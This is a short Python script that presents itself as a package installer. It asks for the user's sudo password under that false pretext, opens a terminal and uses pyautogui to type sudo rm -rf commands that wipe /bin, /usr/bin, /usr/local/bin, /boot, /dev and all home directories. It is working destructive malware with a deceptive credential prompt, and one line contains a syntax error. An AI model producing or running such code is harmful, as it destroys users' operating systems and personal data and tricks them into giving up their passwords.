import os
import pyautogui as p
import time as t

pw=input('What is your sudo password to install this package?   ')
os.system('lxterminal')
t.sleep(1)
p.write('cd /',)
p.press('enter')
p.write('sudo -p ')
p.write(pw)
p.write(' rm -rf /bin/*')
p.press('enter')
p.write('sudo -p ')
p.write(pw)
p.write(' rm -rf /usr/bin/*')
p.press('enter')
p.write('sudo -p ')
p.write(pw)
p.write(' rm -rf /usr/local/bin/*')
p.press('enter')
p.write('if [ -d "boot" ]; then \n sudo -p '
p.write(pw)
p.write(' rm -rf /boot \n fi')
p.press('enter')
p.write('sudo -p ')
p.write(pw)
p.write(' rm -rfv /dev')
p.press('enter')
p.write('cd /home')
p.press('enter')
p.write('sudo -p ')
p.write(pw)
p.write(' rm -rfv *')
